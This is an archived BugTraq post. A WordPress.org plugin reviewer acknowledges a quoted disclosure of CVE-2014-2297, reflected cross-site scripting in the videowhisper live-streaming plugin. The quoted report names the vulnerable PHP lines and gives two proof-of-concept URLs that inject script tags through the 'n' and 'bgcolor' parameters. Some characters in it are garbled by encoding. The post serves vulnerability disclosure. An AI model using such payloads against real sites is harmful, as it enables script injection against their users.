BugTraq
Re: CVE-2014-2297(WordPress-videowhisper-live-streaming-integration 4.29.6-Xss) Apr 08 2014 09:52PM
Ipstenu \(Mika Epstein\) (plugins wordpress org)

Thank you for reporting this plugin. We're looking into it right now.

If you wish to help us speed up the process, please remember to include a clear and concise description of the issue. In the case of any security exploits, it greatly helps if you can provide us with how you verified this is an exploit (links to the plugin listing on sites like Secuina are perfect).

If you provided a link to your report, DO NOT delete it! We have passed it on directly to the developers of the plugin.

Please note: You may not receive further communication from us on this matter, simply due to the volume of emails we get a day. We do greatly appreciate the report.

> Hi All,
>
> CVE-2014-2297(WordPress-videowhisper-live-streaming-integration
> 4.29.6-Xss), as follows:
>
>
>
> [»] Language: [php ]
>
>
>
> [»] Version: [ version4.29.6 ] 
> [»] Team:
> Vty#####################################################################
######
>
>
>
> ===[ Exploit ]==
>
>
>
> [»] Exploit-1�videowhisper-live-streaming-integration/ls/htmlchat.ph
p File
> before using the variable n is not initialized, resulting in cross-site
> scripting vulnerabilities, the specific code in line 34 of the
> fileï¼?Code:<title><?=$n?> Text Chat</title>ï¼?:
> http://localhost//wp/wp-content/plugins/videowhisper-live-streaming-inte
gration/ls/htmlchat.php?n=</title><script>alert(1)</script>
> [»] Exploit-2�videowhisper-live-streaming-integration/ls/index.php 
Bgcolor
> file using variables not previously initialized, resulting in cross-site
> scripting vulnerabilities, the specific code in the sixth line of the
> fileï¼?Codeï¼?<body bgcolor="<?=$bgcolor?>">ï¼?:
> http://localhost//wp/wp-content/plugins/videowhisper-live-streaming-inte
gration/ls/index.php?bgcolor="><script>alert(1)</script>//

--
Ipstenu (Mika Epstein)

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus